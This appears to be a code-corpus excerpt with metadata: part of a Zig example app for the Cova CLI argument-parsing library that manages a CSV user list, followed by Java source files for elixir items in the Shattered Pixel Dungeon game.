// Aliases can be created for Commands and Options to give end users alternative words
// for using those Arguments.
.alias_names = &.{ "delete" },
.cmd_group = "INTERACT",
.opts = &.{
OptionT{
.name = "clean_file",
.description = "Specify a single file to be cleaned (deleted) instead of the defaults.",
.alias_long_names = &.{ "delete_file" },
.short_name = 'f',
.long_name = "file",
.val = ValueT.ofType([]const u8, .{
.name = "clean_file",
.description = "The file to be cleaned.",
// Aliases can also be created for Value Child Types to clarify what
// kind of input is expected from end users.
.alias_child_type = "filepath",
// Validation Functions are a powerful feature to ensure end user input
// matches what a project expects. Parsing Functions similarly allow a
// library user to customize how an argument token is parsed into a
// specific type.
.valid_fn = cova.Value.ValidationFns.validFilepath,
}),
},
},
},
CommandT{
.name = "view-lists",
.description = "View all lists (csv files) in the current directory.",
.cmd_group = "VIEW",
},
},
};
// Commands can be created from Structs using the `cova.Command.Custom.from()` function. The rules
// for how they're converted can be configured by customizing the `cova.Command.Custom.FromConfig`
// that is provided to the `from()` function. The rules shown below are the defaults.
pub const User = struct {
// Values
//
// Values are created from valid, non-Optional primitive fields such as:
// - Booleans `bool`
// - Integers `u8` / `i32`
// - Floats `f32`
// - Strings `[]const u8`
//
// If a field begins with an underscore `_` it will be considered private and not converted
// to a Value.
// If a default value is provided for a field, the corresponding Value will inherit it as a
// default value as well.
_id: u16 = 0,
is_admin: bool = false,
// Options
//
// Options are created from valid, Optional primitive fields (i.e. `?bool`, `?u8`, etc).
// Each Option wraps a Value, so the above conversion rules for Values apply to them as well.
//
// Additionally, Options will generate a short and long name from each field by default.
// Short name generation will take the first free lower then upper case character of a field
// name, sequentially working through the name from the first to last character.
// Underscores `_` will also be converted to dashes `-`. End users can also abbreviate
// long names as long as the abbreviation is unique.
first_name: ?[]const u8, // `-f` or `--first-name` (`--first` abbreviation would work)
last_name: ?[]const u8, // `-l` or `--last-name` (`--last` abbreviation would work)
age: ?u8, // -a or --age
phone: ?[]const u8 = "not provided", // -p or --phone
address: ?[]const u8 = "not provided", // -A or --address (`--addr` abbreviation would work)
pub fn from(line: []const u8) !@This() {
var field_iter = std.mem.splitAny(u8, line, ",");
var out: @This() = undefined;
var idx: u3 = 0;
const user_id = field_iter.first();
if (user_id.len == 0) return error.NotUserString;
std.log.debug("User: {s}", .{ user_id });
field_iter.reset();
while (field_iter.next()) |field| : (idx += 1) {
const trimmed_field = std.mem.trim(u8, field, " ");
std.log.debug("Field: {s}", .{ trimmed_field });
switch (idx) {
0 => out._id = std.fmt.parseInt(u16, trimmed_field, 10) catch |err| { std.log.err("ID error: {s}", .{ trimmed_field }); return err; },
1 => out.is_admin = std.mem.eql(u8, trimmed_field, "true"),
2 => out.first_name = trimmed_field,
3 => out.last_name = trimmed_field,
4 => out.age = std.fmt.parseInt(u8, trimmed_field, 10) catch |err| { std.log.err("Age error: {s}", .{ trimmed_field }); return err; },
5 => out.phone = trimmed_field,
6 => out.address = trimmed_field,
else => return error.TooManyTokens,
}
}
return out;
}
pub fn to(self: @This(), str_buf: []u8) ![]const u8 {
return try std.fmt.bufPrint(str_buf, "{d}, {any}, {?s}, {?s}, {?d}, {?s}, {?s}", .{
self._id,
self.is_admin,
self.first_name,
self.last_name,
self.age,
self.phone,
self.address,
});
}
pub fn format(value: @This(), writer: anytype) !void {
try writer.print(
\\User: {d}
\\ - Admin: {any}
\\ - Name: {?s}, {?s}
\\ - Age: {?d}
\\ - Phone #: {?s}
\\ - Address: {?s}
\\
, .{
value._id,
value.is_admin,
value.last_name, value.first_name,
value.age,
value.phone,
value.address,
}
);
}
};
// Commands can be created from Unions same as with Structs.
pub const Filter = union(enum){
id: ?u16,
admin: ?bool,
age: ?u8,
first_name: ?[]const u8,
last_name: ?[]const u8,
phone: ?[]const u8,
address: ?[]const u8,
};
// Commands can also be created from Functions. Similar to Struct and Union Types, the
// `cova.Command.Custom.from()` and `cova.Command.Custom.FromConfig` are used configure and convert
// the Function into a Command. Due to a lack of parameter names in a Function's Type Info,
// Function Parameters can only be converted to Values (not Options).
pub fn open(filename: []const u8) !std.fs.File {
const filename_checked =
if (std.mem.eql(u8, filename[(filename.len - 4)..], ".csv")) filename
else filenameChecked: {
var fnc_buf: [100]u8 = .{ 0 } ** 100;
break :filenameChecked (try std.fmt.bufPrint(fnc_buf[0..], "{s}.csv", .{ filename }))[0..(filename.len + 4)];
};
const open_file = try std.fs.cwd().createFile(filename_checked, .{ .read = true, .truncate = false });
try std.fs.cwd().writeFile(.{ .sub_path = ".ba_persist", .data = filename_checked });
return open_file;
}
pub fn delete(filename: []const u8) !void {
std.fs.cwd().deleteFile(filename) catch std.log.err("There was an issue deleting the '{s}' file!", .{ filename });
}
pub fn main() !void {
// While any Allocator can be used, Cova is designed to wrap what's provided with an
// Arena Allocator. This allows for flexiblity.
var gpa: std.heap.GeneralPurposeAllocator(.{ .verbose_log = builtin.mode == .Debug }) = .{};
const alloc = gpa.allocator();
// Initializing the `setup_cmd` with an allocator will make it available for Runtime use.
const main_cmd = try setup_cmd.init(alloc, .{});
defer main_cmd.deinit();
// Parsing
// - Arg Iterator
// Cova requries an Argument Iterator in order to parse arguments. The easiest way to obtain
// one is simply using `cova.ArgIteratorGeneric.init()` as seen below. This will provide Zig's
// cross-platform `std.process.ArgIterator`, which will iterate through the arguments provided
// to this application. Cova also provides `cova.RawArgIterator` which can be used for testing
// or providing arguments from an alternate source.
var args_iter = try cova.ArgIteratorGeneric.init(alloc);
defer args_iter.deinit();
// - Writer
// Any valid Zig Writer can be used during parsing. Stdout is the easiest option here.
var stdout_file = std.fs.File.stdout();
var stdout_buf: [4096]u8 = undefined;
var stdout_writer = stdout_file.writer(stdout_buf[0..]);
const stdout = &stdout_writer.interface;
defer stdout.flush() catch {};
// Using `cova.parseArgs()` will parse args from the provided ArgIterator and populate provided
// Command. It's important to note that, by default, if the user calls for `usage` or `help` it
// will trigger an error. This allow's that specific case to be handled specially if needed. If
// there's no need to handle it specially, the below example will simply bypass the error.
cova.parseArgs(&args_iter, CommandT, main_cmd, stdout, .{}) catch |err| switch (err) {
error.UsageHelpCalled,
// Other common errors can also be handled in the same way. The errors below will call the
// Command's Usage or Help prompt automatically when triggered.
error.TooManyValues,
error.UnrecognizedArgument,
error.UnexpectedArgument,
error.CouldNotParseOption => {},
else => return err,
};
// Analysis
//
// In the context of Cova, Analysis refers to dealing with the result of parsed Argument Types.
// This can range from simply debugging the results, to checking if an Argument Type was set,
// to utilizing the resulting values in a project. All of which are demonstrated below.
//
// - Debug Output of Commands after Parsing.
// The `cova.utils.displayCmdInfo()` function is useful for seeing the results of a parsed
// Command. This is done recursively for any sub Argument Types within the Command and can be
// used to debug said Command.
if (builtin.mode == .Debug) try cova.utils.displayCmdInfo(CommandT, main_cmd, alloc, stdout, true);
// - App Vars
var user_filename_buf: [100]u8 = .{ 0 } ** 100;
_ = std.fs.cwd().readFile(".ba_persist", user_filename_buf[0..]) catch {
try std.fs.cwd().writeFile(.{ .sub_path = ".ba_persist", .data = "users.csv" });
for (user_filename_buf[0..9], "users.csv") |*u, c| u.* = c;
};
const ufb_end = std.mem.indexOfScalar(u8, user_filename_buf[0..], 0) orelse 9;
const user_filename = user_filename_buf[0..ufb_end];
std.log.debug("User File Name: '{s}'", .{ user_filename });
var user_file: std.fs.File = try open(user_filename);
defer user_file.close();
var user_file_reader = user_file.reader(&.{});
var user_file_writer = user_file.writer(&.{});
defer user_file_writer.interface.flush() catch {};
const user_file_buf = try user_file_reader.interface.allocRemaining(alloc, .unlimited);
var users: ArrayList(User) = .empty;
defer users.deinit(alloc);
var users_mal: MultiArrayList(User) = .empty;
defer users_mal.deinit(alloc);
var users_iter = std.mem.splitAny(u8, user_file_buf, "\n");
while (users_iter.next()) |user_ln| {
const user = User.from(user_ln) catch break;
try users.append(alloc, user);
try users_mal.append(alloc, user);
}
// - Handle Parsed Commands
// Commands have two primary methods for analysis.
//
// `cova.Command.Custom.matchSubCmd()` will return the Active Sub Command of a Command if its
// name matches the provided string. Otherwise, it returns null. This fits nicely with Zig's
// syntax for handling optional/nullable returns as seen below.
if (main_cmd.matchSubCmd("new")) |new_cmd| {
// Using `cova.Command.Custom.to()` is effectively the opposite of `from()`. It allows a
// Command to be converted into a Struct or Union. As with `from()`, there is a config
// Struct, `cova.Command.Custom.ToConfig`, that can be configured to dictate the rules for
// how the Command is converted.
var new_user = try new_cmd.to(User, .{});
var rand = std.Random.DefaultPrng.init(@as(u64, @truncate(@as(u128, @bitCast(std.time.nanoTimestamp())))));
var user_id = rand.random().int(u16);
while (std.mem.indexOfScalar(u16, users_mal.items(._id), user_id)) |_|
user_id = rand.random().int(u16);
new_user._id = user_id;
try users.append(alloc, new_user);
try users_mal.append(alloc, new_user);
var user_buf: [512]u8 = .{ 0 } ** 512;
try user_file_writer.interface.print("{s}\n", .{ try new_user.to(user_buf[0..]) });
try stdout.print("Added:\n{f}\n", .{ new_user });
}
if (main_cmd.matchSubCmd("open")) |open_cmd| {
// Using `cova.Command.Custom.callAs()` is similar to the `to()` function but converts the
// Command to a Function then calls it directly. If the Function being called is a method,
// (if its first parameter is of an instance's Type) the host instance can be specified as
// the second parameter to `callAs()`, otherwise that parameter should be null.
user_file = try open_cmd.callAs(open, null, std.fs.File);
}
if (main_cmd.matchSubCmd("list")) |list_cmd| {
const filter = if (list_cmd.matchSubCmd("filter")) |filter_cmd| try filter_cmd.to(Filter, .{}) else null;
for (users.items) |user| {
const print_user: bool = if (filter) |fil| switch (fil) {
.id => |id| id.? == user._id,
.admin => |admin| admin.? == user.is_admin,
.first_name => |first| if (user.first_name) |u_first| std.mem.eql(u8, first.?, u_first) else false,
.last_name => |last| if (user.last_name) |u_last| std.mem.eql(u8, last.?, u_last) else false,
.age => |age| if (user.age) |u_age| age == u_age else false,
.phone => |phone| if (user.phone) |u_phone| std.mem.eql(u8, phone.?, u_phone) else false,
.address => |addr| if (user.address) |u_addr| std.mem.eql(u8, addr.?, u_addr) else false,
} else true;
if (print_user) try stdout.print("{f}\n", .{ user });
}
}
if (main_cmd.matchSubCmd("clean")) |clean_cmd| cleanCmd: {
// The Sub-Commands, Options, and Values of a Command can be referenced by name using
// the following methods:
// - `cova.Command.Custom.getSubCmds()`
// - `cova.Command.Custom.getOpts()`
// - `cova.Command.Custom.getVals()`
// These methods create StringHashMaps of the Argument Types using their `name`s as keys.
if ((try clean_cmd.getOpts(.{})).get("clean_file")) |clean_opt| {
if (clean_opt.val.isSet()) {
const filename = try clean_opt.val.getAs([]const u8);
try delete(filename);
break :cleanCmd;
}
}
try delete("users.csv");
try delete(".ba_persist");
}
// Conversely, the `cova.Command.Custom.checkSubCmd()` method should be used if the Command
// doesn't need to be returned. This will simply return a boolean check on whether or not
// the provided string is the same Active Sub Command's name.
if (main_cmd.checkSubCmd("view-lists")) {
try stdout.print("Available Lists:\n", .{});
var dir_walker = try (try std.fs.cwd().openDir(".", .{ .iterate = true })).walk(alloc);
defer dir_walker.deinit();
var found_list = false;
while (try dir_walker.next()) |entry| {
const filename = entry.basename;
if (filename.len <= 4) continue;
if (std.mem.eql(u8, filename[(filename.len - 4)..], ".csv")) {
found_list = true;
try stdout.print("- {s}\n", .{ filename });
}
}
if (!found_list) try stdout.print("- None Found!\n", .{});
}
}
| 20,577 | basic_app | zig | en | zig | code | {"qsc_code_num_words": 2684, "qsc_code_num_chars": 20577.0, "qsc_code_mean_word_length": 4.55551416, "qsc_code_frac_words_unique": 0.21087928, "qsc_code_frac_chars_top_2grams": 0.01529402, "qsc_code_frac_chars_top_3grams": 0.01946512, "qsc_code_frac_chars_top_4grams": 0.00629754, "qsc_code_frac_chars_dupe_5grams": 0.08489409, "qsc_code_frac_chars_dupe_6grams": 0.04678171, "qsc_code_frac_chars_dupe_7grams": 0.03451378, "qsc_code_frac_chars_dupe_8grams": 0.03009733, "qsc_code_frac_chars_dupe_9grams": 0.02502658, "qsc_code_frac_chars_dupe_10grams": 0.02502658, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00861781, "qsc_code_frac_chars_whitespace": 0.2725373, "qsc_code_size_file_byte": 20577.0, "qsc_code_num_lines": 412.0, "qsc_code_num_chars_line_max": 151.0, "qsc_code_num_chars_line_mean": 49.94417476, "qsc_code_frac_chars_alphabet": 0.80820362, "qsc_code_frac_chars_comments": 0.40234242, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08365019, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.00380228, "qsc_code_frac_chars_string_length": 0.10644873, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/elixirs/ElixirOfAquaticRejuvenation.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.elixirs;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.FlavourBuff;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.items.quest.GooBlob;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfHealing;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.BuffIndicator;
import com.watabou.noosa.Image;
import com.watabou.utils.Bundle;
import com.watabou.utils.GameMath;
import com.watabou.utils.Random;
public class ElixirOfAquaticRejuvenation extends Elixir {
{
//TODO finish visuals
image = ItemSpriteSheet.ELIXIR_AQUA;
}
@Override
public void apply(Hero hero) {
Buff.affect(hero, AquaHealing.class).set(Math.round(hero.HT * 1.5f));
}
@Override
public int price() {
//prices of ingredients
return quantity * (30 + 50);
}
public static class AquaHealing extends Buff {
{
type = buffType.POSITIVE;
announced = true;
}
private int left;
public void set( int amount ){
if (amount > left) left = amount;
}
@Override
public boolean act() {
if (Dungeon.level.water[target.pos] && target.HP < target.HT){
float healAmt = GameMath.gate( 1, target.HT/50f, left );
healAmt = Math.min(healAmt, target.HT - target.HP);
if (Random.Float() < (healAmt % 1)){
healAmt = (float)Math.ceil(healAmt);
} else {
healAmt = (float)Math.floor(healAmt);
}
target.HP += healAmt;
left -= healAmt;
target.sprite.emitter().burst( Speck.factory( Speck.HEALING ), 1 );
}
if (left <= 0){
detach();
} else {
spend(TICK);
if (left <= target.HT/4f){
BuffIndicator.refreshHero();
}
}
return true;
}
@Override
public int icon() {
return BuffIndicator.HEALING;
}
@Override
public void tintIcon(Image icon) {
FlavourBuff.greyIcon(icon, target.HT/4f, left);
}
@Override
public String toString() {
return Messages.get(this, "name");
}
@Override
public String desc() {
return Messages.get(this, "desc", left);
}
private static final String LEFT = "left";
@Override
public void storeInBundle( Bundle bundle ) {
super.storeInBundle( bundle );
bundle.put( LEFT, left );
}
@Override
public void restoreFromBundle( Bundle bundle ) {
super.restoreFromBundle( bundle );
left = bundle.getInt( LEFT );
}
}
public static class Recipe extends com.shatteredpixel.shatteredpixeldungeon.items.Recipe.SimpleRecipe {
{
inputs = new Class[]{PotionOfHealing.class, GooBlob.class};
inQuantity = new int[]{1, 1};
cost = 6;
output = ElixirOfAquaticRejuvenation.class;
outQuantity = 1;
}
}
}
| 3,876 | ElixirOfAquaticRejuvenation | java | en | java | code | {"qsc_code_num_words": 455, "qsc_code_num_chars": 3876.0, "qsc_code_mean_word_length": 6.03736264, "qsc_code_frac_words_unique": 0.42417582, "qsc_code_frac_chars_top_2grams": 0.04586822, "qsc_code_frac_chars_top_3grams": 0.16599927, "qsc_code_frac_chars_top_4grams": 0.16017474, "qsc_code_frac_chars_dupe_5grams": 0.16345104, "qsc_code_frac_chars_dupe_6grams": 0.06042956, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01109702, "qsc_code_frac_chars_whitespace": 0.18627451, "qsc_code_size_file_byte": 3876.0, "qsc_code_num_lines": 147.0, "qsc_code_num_chars_line_max": 105.0, "qsc_code_num_chars_line_mean": 26.36734694, "qsc_code_frac_chars_alphabet": 0.85986049, "qsc_code_frac_chars_comments": 0.2125903, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.1122449, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00393185, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.00680272, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.10204082, "qsc_codejava_score_lines_no_logic": 0.2755102, "qsc_codejava_frac_words_no_modifier": 0.90909091, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/elixirs/ElixirOfToxicEssence.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.elixirs;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.ToxicImbue;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.PoisonParticle;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.AlchemicalCatalyst;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfToxicGas;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class ElixirOfToxicEssence extends Elixir {
{
//TODO finish visuals
image = ItemSpriteSheet.ELIXIR_TOXIC;
}
@Override
public void apply(Hero hero) {
Buff.affect(hero, ToxicImbue.class).set(ToxicImbue.DURATION);
hero.sprite.emitter().burst(PoisonParticle.SPLASH, 10);
}
@Override
protected int splashColor() {
return 0xFF00B34A;
}
@Override
public int price() {
//prices of ingredients
return quantity * (30 + 40);
}
public static class Recipe extends com.shatteredpixel.shatteredpixeldungeon.items.Recipe.SimpleRecipe {
{
inputs = new Class[]{PotionOfToxicGas.class, AlchemicalCatalyst.class};
inQuantity = new int[]{1, 1};
cost = 6;
output = ElixirOfToxicEssence.class;
outQuantity = 1;
}
}
}
| 2,153 | ElixirOfToxicEssence | java | en | java | code | {"qsc_code_num_words": 256, "qsc_code_num_chars": 2153.0, "qsc_code_mean_word_length": 6.4296875, "qsc_code_frac_words_unique": 0.546875, "qsc_code_frac_chars_top_2grams": 0.09295261, "qsc_code_frac_chars_top_3grams": 0.20777643, "qsc_code_frac_chars_top_4grams": 0.18712029, "qsc_code_frac_chars_dupe_5grams": 0.2454435, "qsc_code_frac_chars_dupe_6grams": 0.16889429, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01750547, "qsc_code_frac_chars_whitespace": 0.15095216, "qsc_code_size_file_byte": 2153.0, "qsc_code_num_lines": 70.0, "qsc_code_num_chars_line_max": 105.0, "qsc_code_num_chars_line_mean": 30.75714286, "qsc_code_frac_chars_alphabet": 0.88293217, "qsc_code_frac_chars_comments": 0.38272178, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08571429, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00752445, "qsc_code_frac_lines_prompt_comments": 0.01428571, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.08571429, "qsc_codejava_score_lines_no_logic": 0.34285714, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 1, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/elixirs/ElixirOfHoneyedHealing.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.elixirs;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Healing;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.Bee;
import com.shatteredpixel.shatteredpixeldungeon.items.Honeypot;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfHealing;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.noosa.audio.Sample;
public class ElixirOfHoneyedHealing extends Elixir {
{
image = ItemSpriteSheet.ELIXIR_HONEY;
}
@Override
public void apply(Hero hero) {
Buff.affect( hero, Healing.class ).setHeal((int)(0.8f*hero.HT + 14), 0.25f, 0);
PotionOfHealing.cure(hero);
Buff.affect(hero, Hunger.class).satisfy(Hunger.STARVING/5f);
}
@Override
public void shatter(int cell) {
if (Dungeon.level.heroFOV[cell]) {
Sample.INSTANCE.play( Assets.SND_SHATTER );
splash( cell );
}
Char ch = Actor.findChar(cell);
if (ch != null){
Buff.affect( ch, Healing.class ).setHeal((int)(0.8f*ch.HT + 14), 0.25f, 0);
PotionOfHealing.cure(ch);
if (ch instanceof Bee && ch.alignment != curUser.alignment){
ch.alignment = Char.Alignment.ALLY;
((Bee)ch).setPotInfo(-1, null);
}
}
}
@Override
public int price() {
//prices of ingredients
return quantity * (30 + 5);
}
public static class Recipe extends com.shatteredpixel.shatteredpixeldungeon.items.Recipe.SimpleRecipe {
{
inputs = new Class[]{PotionOfHealing.class, Honeypot.ShatteredPot.class};
inQuantity = new int[]{1, 1};
cost = 4;
output = ElixirOfHoneyedHealing.class;
outQuantity = 1;
}
}
}
